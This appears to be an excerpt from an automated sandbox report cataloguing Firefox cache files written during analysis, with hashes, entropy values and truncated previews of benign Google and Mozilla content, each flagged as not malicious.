                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (2360)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):224984
                                                                                                                                                                                  Entropy (8bit):5.53877410439541
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:E0nzyu8ItYoHFldaY4xzuQVLlGDPcHGcp1+8Z:lnCuYgTaY4/GqGQs8Z
                                                                                                                                                                                  MD5:3A3A1B2920FE18AC9E027FF25407025A
                                                                                                                                                                                  SHA1:878BF92EF3A65047215A99B81B55302A40FA9035
                                                                                                                                                                                  SHA-256:F335C39D33AC1DF6C3142A23A17AB91C154F6A85D683D3ABE4681085B181DE79
                                                                                                                                                                                  SHA-512:9F3729E0DFDD9CEBEF14FEF904DE8EFB84E58502183B4A7178D7741A59B490281B0A02E0B6D19A3D2F3BF75060AFED6A63A67D9335002581727F7725DF853172
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x689603f, 0x2040058e, 0x3f34e599, 0x30e4e33d, 0x0, 0x0, 0x3006b000, 0xe, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2013 Google LLC.. SPDX-License-Identifier: Apache-2.0.*/.var baa,daa,Ra,haa,$a,cb,db,eb,fb,iaa,gb,lb,jaa,kaa,pb,naa,paa,Eb,qaa,taa,vaa,Aaa,Qb,Caa,Daa,Iaa,Oaa,Paa,Maa,Qaa,Vaa,Waa,Yaa,Zaa,$aa,aba,Lc,dba,cba,fba,Pc,Oc,hba,gba,kba,jba,Vc,nba,oba,dd,cd,Rc,zba,wba,Aba,Bba,Eba,Gba,Hba,uba,Qd,Rd,aca,je,cca,ke,dca,fca,hca,lca,mca,nca,oca,rca,tca,xca,yca,Cca,Mca,Ica,Oca,Qca,Rca,Uca,Wca,Zca,$ca,ada,bda,cda,fda,jf,gda,ida,lda,mda,aaa,nda,Af,oda,Cf,pda,qda,Ef,sda,Gf,zda,Dda,Cda,Of,Fda;_.aa=function(a){return fu

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\B302C778F3241FCDA90D00D37CE6F8D0A686EA53

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.039194877425497
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:0MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEck/LUcu/LU3:jWebV2GZuZrFK0k0t7qW0NbZovEpkA
                                                                                                                                                                                  MD5:8CDB47766FF6B9734CBACEACE9641A26
                                                                                                                                                                                  SHA1:39C11E740EB20E338DD4A542A12A3D9B6C99D006
                                                                                                                                                                                  SHA-256:8B13BAF74DF0918A7022A1A5400812F75FD61C92CED620607125AB681D534FED
                                                                                                                                                                                  SHA-512:33D3154E5813FA35E589D637FB933F3F20D7B524C44BB60FE698BD06F0327C327576E144EA01002F4A0230643CB550A003CDEC9F3F1F3168892B6CFCAE3CF8B6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..mO........e...e...F.A.e...........a,~1708515001,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/b21f31f8-fb59-4e8d-9fe8-b64d11a07cfa.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeB

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\B3316860430DA0966649580110E85D2FFB7B5A61

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1116)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):82933
                                                                                                                                                                                  Entropy (8bit):5.669831521788845
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:4GIr9iykWXc8VV4ucbxiyXdpGupDMbSrOLR0QZWtPWDG4nFjI9rkiDyVO9HI4Ckz:h45nb3nxQIiENg5Bi+C02byFxv8m
                                                                                                                                                                                  MD5:2E11DEDABD6899B63B28254926E9B636
                                                                                                                                                                                  SHA1:80A2E1EBE03456BD0B86D935FBE045D06FBCAC43
                                                                                                                                                                                  SHA-256:1A914F6B06DC7F867636329CD7DA8FAAFE6BC9F346D247D53B83DEED8BBB1F68
                                                                                                                                                                                  SHA-512:384BD2F532FB98BDF324E02FE391FDDFCB793A22121545899E194833EE5A86B350DAF60395923145D7EB6BF3A9ADA021658B96F10F5987DABB07DB5FC3A84663
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. f

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\B955C425A363A4472B49635AF0DFB280DB96DD99

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8044
                                                                                                                                                                                  Entropy (8bit):6.04220673130266
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:fceMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZov0ckaLUcuaI:f2WebV2GZuZrFK0k0t7qW0NbZov0pvR
                                                                                                                                                                                  MD5:5C1BC75F9F56E6855FC58A9EFCFC6720
                                                                                                                                                                                  SHA1:E06CEF628F6541EC1751C5C39CDD1D20BBA7E8B4
                                                                                                                                                                                  SHA-256:FB9EAEB5B0F8DA2BA567AAFBCED1C28C4CEB33BECBB747354DC013F25941C9FC
                                                                                                                                                                                  SHA-512:08A538B37FC67D4E240C4182FC57AD716ABA1DF4DDCB9BE086C2C031C375C5D1F4745002809E64FCF492BCD7B86FE2E78E95CF7D301E2BA0B1C77C312938EACB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........e...e...F.A.e......z....a,~1708514979,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/a7791896-2046-4b05-9685-73f32d9a99cc.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeBlo99E8hszS

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\BE13857FAF251CCA8C4AE07311778B6623EF86DC

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18388
                                                                                                                                                                                  Entropy (8bit):5.822959992107189
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:yPwmZ/4L6dbuMBA62ukuPpi0eLYGBRohB1r1uk/KiFTaIda4u:xk+M/phe8GvIDuuKOa8M
                                                                                                                                                                                  MD5:BC6D050E75279B2EBC6A5F51EFE4BBE8
                                                                                                                                                                                  SHA1:D3C5E3D5DE0D968360E4A3FF2896D76C1B244C73
                                                                                                                                                                                  SHA-256:4031428EEB69E6CCF1B98A5D6B8B3DDAE63CC9595D63D23F39A1F353F90BEAAC
                                                                                                                                                                                  SHA-512:286781D140FE9A932158BF8D26FC1CA6BB8FD5B3841094583987FA25D9BA9403F47B03E77D9FEB7DCE4497368DF2E7D33952E2ABF77F42A4B29C79DF00F68A63
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"signature":{"ref":"3sxgg1ah4an421obr0dsmnp0rs","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"-xGeEstPfIJ28hr6tg7ff17SPt4bb-48x3o23AG7TlzTVo6AWQPiYzSs_WzjdYDD46_AHzXIqShEr_giQw4kjFblJ4R1ZoUgLOJ-kdOIelaHfsm1br2ICbaSTAsD1uou","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"displayFields":["addon_id"],"id":"pioneer-study-addons-v1","last_modified":1708041616659},"timestamp":1607042143590,"changes":[{"name":"Political and COVID-19 News Information Flows Study","icons":{"32":"https://ion-extension.prod.dataops.mozgcp.net/Princeton-Shield-32px.png","64":"https://ion-extension.prod.dataops.mozgcp.net/Princeton-Shield-32px.png","128":"https://ion-extension.prod.dataops.mozgcp.net/

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\BF2AFF38EE726CCE433397C53DC3AB6D7A768836

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 4261543936
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11695
                                                                                                                                                                                  Entropy (8bit):6.4136728006012085
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ve4Sj8TUmWPYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxkDCvDXhj46:m4SjMULWmzwTWvoglJmzwTWvogrBHJmX
                                                                                                                                                                                  MD5:E64084DDFAA9929E7E103C42B60C368C
                                                                                                                                                                                  SHA1:E8837D47C1F14EC695A2DB505A0F1CCE83C9010E
                                                                                                                                                                                  SHA-256:33F8893989F0AB05FDB11A2AC7906F2AA299DB3E0D715262FADC0FD4E1CBE734
                                                                                                                                                                                  SHA-512:D81600268DC168E7D30D9A989850A56B3CCE6514A9D4E9D96B7206C79304FB090B6CA798247F1A210E630A561821D9DF887B046A197B483F6CA0FE986DD45851
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........U]o.0.}.H.P..foS......VuZ[uYU!c_./.`.R.O.....{.c.{.=.\.Mbh.:.\w-=.1..$..9.a.t|+..Q..~s7..B~....B...,j/...DZ-..Y.S...4.]l.\:..k..K..Y. .!.~e..U.bt..w:....!.v...\z.L\.R.[..0...a..mr.,..D*..~V.....y..eQ..h..:....j.......tn..... J.AOB...l._1A*...fg.P.v...h...5X.>l.........'n.T.z..m...5...(b)..p..Y..*Gp.fay6..^4.t...,.......Ngl..X...!...-.d.i.p..J.*I A....O....v.1.;9.0.Q..D.....^w.o...........@i....)...?......].W&vFu,.vp.d...W...3....D....."a7..I......../..Jo......."..&..c d,.8&.x. ...X+.p.F..6U|.........<L<.+/...G......N.......|..TY...2......].O...I.uP..*..s.J.D@.b^...8.....99.M.(.5..i.Z..../H....\.R.%V.@..s|.L9......PYy.aG.WX&.....5{.}Ex.C.......!#Nc<..4. 0s.~If.......\.....7...j.....p.@.Q.......[...n....p........e...e...F.A.g..;........O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.D0FJR7J34cc.L.F4.O

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\BFB76AE057440A16593FE08B2FE91F5D71B2F963

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8635
                                                                                                                                                                                  Entropy (8bit):6.104637165326964
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:KUBfcfeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdIdSdIdN:/cfeLYGBRohB1r1uk/KiFTaIda/e
                                                                                                                                                                                  MD5:10A8A1351A4541E4A0ECBE3878BF768C
                                                                                                                                                                                  SHA1:67E89DE81B2B6CCD71C6A27A523F8A21439EAA2E
                                                                                                                                                                                  SHA-256:D251D5471DCCB2B11470406B883D2C54724B07267AA19D29FEF422E07FF274B2
                                                                                                                                                                                  SHA-512:9D1AA9D9D1E88B4E2EA56344D0EB26CD5F5B6EA7391799D1AECD7AD137ED8CCFA2CCFC23635935370C3759886084001C22683C8DD23C8D960FDB4FC25172D5D3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"signature":{"ref":"11rufr35kqbk31bmg5n729kkoa","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"xgTVutOXxmWwBSW0E3gL_qtYiCHV5iFp8onHFZC1gP3AAOrXGjaPbzaXpDbP_82MN40b9cXndgp4Jynj4GoxRZ6Syfy7qEnSrzWBLZtb957yRoZ_J0p8eAnnrDror6uV","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"id":"websites-with-shared-credential-backends","last_modified":1708041610977}}.?............e...e...F.B.e..X........:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/websites-with-shared-credential-backends?_expected=1659924446436.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sg

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\C01425A73E10884AEF7072E5F96EAC6DE8E38E78

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1573144
                                                                                                                                                                                  Entropy (8bit):7.999354159537703
                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                  SSDEEP:24576:o1O22TCwmuQGB2D4aM7kJvJcWyJxQOvog/VrvkYwnnta7gl4qnSfM6i:K2TY1+2c7CvJ9KoKkY7K4qSfTi
                                                                                                                                                                                  MD5:1246A33A2875D50EC0D61A81DE781231
                                                                                                                                                                                  SHA1:B46CAF51E38596C98ABEF52E9EAD086ABCCD7217
                                                                                                                                                                                  SHA-256:2108E40F2315CA91D9ACCDF719D7F64CA840EB4AF351BC9FB69F81344E8E70C9
                                                                                                                                                                                  SHA-512:65069DFFD0F470151569680BF77CE84BE71FB698B65143651D5FBC043C921A51F80CD2776B72484041F2D69C3F87FA12801A6D48C5E4C12550AFBDCD681E160F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...?).......[u.....(.. .`.....y...... E.w.t...`T .n0.p0=..T.y.TUUU..0..m.3..>..?.?.".-(..".-(..".-(..".-(..".-(..".-(..".-(..".-(..".m.z.V.........{.4t<.^..-.._.yB}:.....z.........<.A..5.s.........Di.x...{.<.a]..5....]...^..Ei.x...{.<.Q]..5.+..\...^..Di.x.F.{.<.q].k5....]......Ei.x...{.<.I..5.[.N.....ODi.x.&.{.<.i..;5...N.....OEi.x...{.<.Y...5....<...>..Di...f.{.<.y=.G5....=...>..Ei.....{...E=...g..<...>./Di.....{...e............../Ei.....{...U....7.........Di...V.{...u..w.........~..Ei.....{...M}...O.n|...~.oDi...6.{...m}./....n}...~.oEi.....{...]}............Di...v.{...}.._............Ei.....{.|.C..u...........Di............c...D....l....n..F.m....o.....&1..Ln.S...1..Lo.3...f1...n.s....1...o..Z......,n.KZ.....,o.+Z..V...n.kZ......o.....6...ln.[......lo.;...v....n.{...........:...q.....G:..q.....':..Nq....g:...q.........q..\..W...q..\..7...nq.....w....q......z.....<..Oz....<../z..^....oz............>..|.._.....|..?...~.............o.#.$.p

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\C16BC3AC2BBCF6753500154D1C91B0EEA450EF48

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 605618176
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17287
                                                                                                                                                                                  Entropy (8bit):7.310741678272729
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:NUY2i+E6JNHv2KhXZqlqmzwTWvoglJmzwTWvogrBHJm2OdAnAyCvDxfCvDxh:Ii+E6DvXJszSWvoI8zSWvoIBHJmvOz
                                                                                                                                                                                  MD5:C7C22C3AEDE69762CFA77876F3CF5479
                                                                                                                                                                                  SHA1:9CAC96040929629AFA7FC4131D61405AEFDD2C61
                                                                                                                                                                                  SHA-256:4E8F1FA973EE47378BC425FF0638D3654B53A0447613B4207F35F4767C558A4B
                                                                                                                                                                                  SHA-512:B3206129BE295D9943B01ED0D6FD71E04C73000D7AE56021A21B48A233CDC20511879C00778AE5627370470FABDDE3BF3AF3766DFA7616B6ADC6594078DEF8C3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........Zys.8...".L...DK9..2.*>.q...Nzf.....$.(..}I.}....Rt..-.,.xx...H[&..$.C/..t.&....r.^...h9K..p4;.}....V.k[..g^.F3...x..:...Xio......i.`..X....b../.=......}V..k..A..g...../.....+?-...s.g....Egx.G.}n~.z...8......=n.f.5...8M...np..I`z.T3h...[{<..t^1...G{...*=.....c]{..b.K.O_.s~...&..q.y....Mr..q#.....q...........9..V.U=l;.gN..(.w..F.b.....'.g<...(Ig|....}.y..C.;..m.. ...aP...Y...<I....b......X..j...,.x..)...O#.bit.......V..M..T.Nd.e.Eq:........qp@nFq8.g.-.v.]...6.....X..?.E....U.....m....A..3h.tH.U.....3.C:#u...B.....l9.h.PI..^....Z'r}`..+..Ou.iz....U..6.R....".O.:........L.-0\.....s.R4...i.L....|.B..N...67.K........J..~|?.5C......B.ngG..y...x.g^.....(...U.4).+a<AV...09.........8....Z].A.{..N .3F..[...~u...Y..|..Y.Y!{^G.kE.e..p...j..P].......D...M7.}.....Pe.l.p.dA.w..v...g..ZM.....[e.M&&...wa.'.!.9..........@.<....P.7...-..`.q?.|n....K.....:.<..`..q>......|.3.2.\._.M!%)..o!<.a.0~.............GS....j9.}.0...W!....E.Y...

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\C475613F2AE9AAB6A7121FBE2D1E34C659F9503A

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 1463156736
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24309
                                                                                                                                                                                  Entropy (8bit):7.661672149995045
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:o/zIqnLirh+zGXXsyZhP0JTJiAC0eEg1pclKu5bebAOnHmzwTWvoglJmzwTWvogd:o/z6hsC8yjaTJivtclH55bzSWvoI8zSU
                                                                                                                                                                                  MD5:68A0ED0DB06410AFE3A333C2FEEB4DAE
                                                                                                                                                                                  SHA1:D7B95202367E438E115D8A308D12C4FF9492F56A
                                                                                                                                                                                  SHA-256:3592EDFE83CA90DA1FCE2F1D0A6EF7ED7C48A2EC58596C30BF73E016E40D2C7C
                                                                                                                                                                                  SHA-512:F7C8F05E7AC94F36056B13E06D1D277A85D2699FBD755381AC8EA19BED33BC2B69E22BF7B9ED99E8072E7F3CB0989BDD09344405B71CADA7451EE832507BF4F4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........}.[.L.....%..N^blA}.5v#PAA.. r8.dz.mJ.jQ.....\2......<.d.f...Mye.Lzab5.no.E..f..v+...(...:...y..2....a.g.0..#.....M*?z.(.A5.+.......3_.c.\.W..'vX.*........&.J.h.z..J2.y...5K.X..<.y..&......gP....y.:PJ..2.>.$.:...ao..Lg....e..v.=.C..........Z.E..xm.......2.FUV..'......L...C..w6...~.3L.7..z.mYTR....@.Kp}......F.&lD..N..g....']..p.=..7X.Vn..r.. w`@.@Bn...@..W3...o...`w.A.k..7.O}?.K...o.L.....<.7.......E.\.8........>.........<...#........5.g...nH.....a..7..H.=...........:..6-..=.E....lUo=.........-...8_....qE...L..X.eT.%..=....{..#.....U...FP:r..m.....Wk..8...4Uh*.E..`..].- ...0..1..a..|.......Y...XR...+.9._.};....6`...h..#.V4%..7._.;.....T...b(.y\.Gq`..6L.a..k:z...4.....Y.\m@...P.........(.O....u..Y[.__t.)N.*R...g..}..~..Y....S..X...n.K.^..b.W..x... ..\..X7...`.~ga.....ND.2.....4.$v..x....|./..b.....A..:..(|.}.Q&........hK.:...f.O.T....G.......... r.....~.[.....[a....{.;c.....VS.<...Q.+\]..8.z.i?&.I......../-E8.8......|".V...dm..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\C57F54C80201C51BD93544077924F84BB54C55BD

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):82082
                                                                                                                                                                                  Entropy (8bit):5.711406609198048
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:UYKrkQECPot32qKFAlHAEAOBsf51AkSAoA3ABAkWAyaUAtAm/vAIlAX5E95M2+eu:UYKrkQECAt32qKFAlHAEAOyvAkSAoA3t
                                                                                                                                                                                  MD5:7AC3A8DC6761CD86B612C4E33493A66D
                                                                                                                                                                                  SHA1:8D68B5D0C86997EBEE6A8A420B787913B071F641
                                                                                                                                                                                  SHA-256:8DF536889BF214F17D6F1C98005BA8475B6354206164D35D9C8903F8C2CFBDC4
                                                                                                                                                                                  SHA-512:2DC97D8EC6D2AE54A8C9452FA3B825F28F9702D76CE3F9AC7F05322705CD59C455AAD78643B4DC2EFB48564D976667899519E26ED07D6E2B727C8F5979B2592E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"signature":{"ref":"2x2kzzhjssqa9aypmngii7pt4","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-04-09-14-36-39.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"CrXnWu7S4qZDX9x13pGXaiDDpbb9arwZBUWu0lxlepKX8U0nMDMuW9sFf-eASzOPEyLKMn4pvA34tp9qva_IkJvFxOVK5jYBqe2Og4aFEy6yTLEAaPq0N8WV3tj0c4_T","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEwsfTf5S2a2sekbOGwvfp1fzj+EX015Cbp8qoECAsPf3bIiOUBcpsPNrqE7CwENuT9M56G330NauFdbZuhlUOBbOWisNkg7ytb5xloJUDSUNPtm+vMLaNp+RQO9COPvWl"},"displayFields":["id","name"],"id":"normandy-recipes-capabilities","last_modified":1708474596345},"timestamp":1708474596141,"changes":[{"recipe":{"id":1364,"name":"HB: 2024 Win7/8 Device Migration (Win 10/11 EN-US)","action":"show-heartbeat","arguments":{"message":"Please help make Firefox better by taking this short survey","surveyId":"2024-win78-win1011cohort-enus","learnMoreUrl":"https://wiki.mozilla.org/

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\C7C6BC53EB2EF9987356C8FAA78073A25B5B9080

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):19442
                                                                                                                                                                                  Entropy (8bit):6.763445506335559
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:x/mBQK9Bes3PiYH7VqN4mApqN3Xo70tNo+pwPm082nyFz/aMG:xwQFk6VApQHkKo+pwPo2Z
                                                                                                                                                                                  MD5:EBB64F05FF3DEB62336B2AA8AC00A8FC
                                                                                                                                                                                  SHA1:2A683EDE8C1FAADB17580AD28DEBCE9C99CE2D08
                                                                                                                                                                                  SHA-256:CBA20C8ECE7D9CFAC0F8B0CCA7FAB77F04F10A6AD52C03354CB1E1FED2862FDF
